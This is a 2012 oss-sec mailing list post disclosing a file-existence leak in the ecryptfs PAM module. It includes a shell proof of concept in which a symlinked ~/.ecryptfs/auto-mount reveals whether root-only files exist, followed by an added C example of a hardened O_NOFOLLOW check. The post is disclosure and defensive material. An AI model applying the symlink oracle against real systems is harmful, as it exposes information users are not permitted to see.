oss-sec mailing list archives

Re: Re: ecryptfs headsup


From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Sat, 14 Jul 2012 09:18:27 +0200

Looks like another issue with that pam module. I can determine whether
or not any file exists as an unprivileged user:

We make sure that we have an existing root file and a non-existing root file:
zx2c4@bwog ~ $ sudo touch /root/this-file-exists
zx2c4@bwog ~ $ sudo rm -f /root/this-file-does-not-exist

We double check that zx2c4 can't know about them:
zx2c4@bwog ~ $ stat /root/this-file-exists
stat: cannot stat `/root/this-file-exists': Permission denied
zx2c4@bwog ~ $ stat /root/this-file-does-not-exist
stat: cannot stat `/root/this-file-does-not-exist': Permission denied
zx2c4@bwog ~ $ ls /root
ls: cannot open directory /root: Permission denied

We replace .ecryptfs/auto-mount with a symlink to a root file that
does not exist:
zx2c4@bwog ~ $ rm -f .ecryptfs/auto-mount
zx2c4@bwog ~ $ ln -s /root/this-file-does-not-exist .ecryptfs/auto-mount
And we see that our private directory doesn't get mounted:
zx2c4@bwog ~ $ sudo login zx2c4
Password:
Last login: Sat Jul 14 03:07:33 EDT 2012 on pts/5
zx2c4@bwog ~ $ mount|grep ecrypt

zx2c4@bwog ~ $ exit

We next replace .ecryptfs/auto-mount with a symlink to a root file
that *does* exist:
zx2c4@bwog ~ $ rm -f .ecryptfs/auto-mount
zx2c4@bwog ~ $ ln -s /root/this-file-exists .ecryptfs/auto-mount

And we see that it does in fact get mounted:
zx2c4@bwog ~ $ sudo login zx2c4
Password:
Last login: Sat Jul 14 03:09:10 EDT 2012 on pts/5
zx2c4@bwog ~ $ mount|grep ecrypt
/home/zx2c4/.Private on /home/zx2c4/Private type ecryptfs
(ecryptfs_check_dev_ruid,ecryptfs_sig=e38bb31e419c9f03,ecryptfs_fnek_sig=5e2b499985de965d,ecryptfs_cipher=aes,ecryptfs_key_bytes=16,ecryptfs_unlink_sigs)

File existence disclosure.
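Added example (mine, not code from Jason's post or from pam_ecryptfs): a privileged process testing a per-user flag file such as ~/.ecryptfs/auto-mount with O_NOFOLLOW, placed beside the naive stat() check that yields the existence oracle shown above. The temp-directory fixture, its file names and the function names are constructed for the demo.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive privileged check: stat() follows symlinks, so a user-placed symlink
   turns "is the flag present?" into "does the target exist?" (the oracle
   demonstrated in the post). */
int flag_exists_following(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0;
}

/* Hardened check: O_NOFOLLOW makes open() fail with ELOOP if the final
   component is a symlink, and fstat() on the opened fd cannot be raced by
   a rename. The flag must also be a regular file owned by the user being
   logged in. Parent components (e.g. ~/.ecryptfs) need the same care in
   real code, such as an openat() walk with O_NOFOLLOW at every step. */
int flag_exists_nofollow(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC | O_NOCTTY);
    if (fd < 0)
        return 0; /* ENOENT, ELOOP (symlink), EACCES all mean "no flag" */
    int ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_uid == owner;
    close(fd);
    return ok;
}

/* Constructed fixture: a real flag, plus a symlink flag pointing at a file
   standing in for /root/this-file-exists. Returns 1 when the naive check is
   fooled by the symlink while the hardened check accepts only the real flag. */
int run_demo(void)
{
    char dir[] = "/tmp/flagdemo.XXXXXX", real[64], link[64], target[64];
    if (!mkdtemp(dir))
        return -1;
    snprintf(real, sizeof real, "%s/auto-mount", dir);
    snprintf(link, sizeof link, "%s/auto-mount-symlink", dir);
    snprintf(target, sizeof target, "%s/secret-target", dir);
    if (close(open(real, O_WRONLY | O_CREAT, 0600)) ||
        close(open(target, O_WRONLY | O_CREAT, 0600)) || symlink(target, link))
        return -1; /* close(-1) fails too, so a failed open() is caught here */
    int r = flag_exists_nofollow(real, getuid()) &&
            !flag_exists_nofollow(link, getuid()) && flag_exists_following(link);
    unlink(link); unlink(target); unlink(real); rmdir(dir);
    return r;
}

int main(void) { printf("demo %s\n", run_demo() == 1 ? "passed" : "failed"); return 0; }
```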